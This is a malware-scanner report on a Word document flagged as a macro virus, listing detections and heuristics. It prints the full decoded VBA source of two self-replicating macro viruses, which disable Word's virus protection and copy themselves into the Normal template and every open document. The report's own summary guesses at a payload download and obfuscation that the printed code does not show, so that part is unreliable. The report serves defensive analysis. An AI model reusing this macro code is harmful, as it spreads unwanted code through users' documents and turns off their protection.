MALICIOUS
176
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic and VBA macros, indicated by the OLE_LEGACY_WORDBASIC_AUTOEXEC and OLE_VBA_MACROS heuristics. The Document_Open and Auto_Close macros suggest an attempt to execute code upon opening or closing the document. While the macro code itself is obfuscated and contains self-modification attempts, the presence of these macros and the ClamAV detections (Doc.Trojan.Thus-10, Doc.Trojan.Titch-3) strongly suggest a malicious intent, likely to download and execute a second-stage payload.
Heuristics 5
-
ClamAV: Doc.Trojan.Thus-10 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Thus-10
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() 'Thus_001' -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Attribute VB_Name = "Arbind2000" Sub AutoClose() 'arbind2000
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3795 bytes |
SHA-256: e8fd23099947455492252d801848ab05453dd619166d01b313451af8a9449386 |
|||
|
Detection
ClamAV:
Doc.Trojan.Titch-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_001'
'Anti-Smyser'
' This virus is an alteration of a virus which was
' designed to delete all files from one's C: drive on Dec 13th.
' This code is completely benign.
On Error Resume Next
Application.Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Anti-Smyser'" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
.CodeModule.CountOfLines
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
.CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
.Item(1).CodeModule.CountOfLines)
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
For k = 1 To Application.Documents.Count
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Anti-Smyser'" Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
.CodeModule.DeleteLines 1, Application.Documents.Item(k) _
.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
End If
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
.CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
.Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
.VBComponents.Item(1).CodeModule.CountOfLines)
End If
Next k
End Sub
Private Sub Document_Close()
Document_Open
End Sub
Private Sub Document_New()
Document_Open
End Sub
Attribute VB_Name = "Arbind2000"
Sub AutoClose()
'arbind2000
'An experiment in Macro programming ;)
'Minimum stealth, no encryption, No payload, No mail replication
'If you had looked you could have found and deleted it but..
'You probably never knew it was here!
On Error Resume Next
Application.Options.VirusProtection = False
Application.Options.SaveNormalPrompt = False
Application.Options.ConfirmConversions = False
Dim x As Integer
Dim found As Boolean
found = False
x = 1
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents.Item(x).CodeModule.Lines(2, 1) = "'arbind2000" Then found = True
Next x
If Not found Then
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "arbind2000", wdOrganizerObjectProjectItems
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
found = False
x = 1
For x = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents.Item(x).CodeModule.Lines(2, 1) = "'arbind2000" Then found = True
Next x
If Not found Then
NormalTemplate.VBProject.VBComponents("arbind2000").Export ("c:\arbind2000.tmp")
ActiveDocument.VBProject.VBComponents.import ("c:\arbind2000.tmp")
ActiveDocument.SaveAs ActiveDocument.FullName
Kill ("c:\arbind2000.tmp")
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.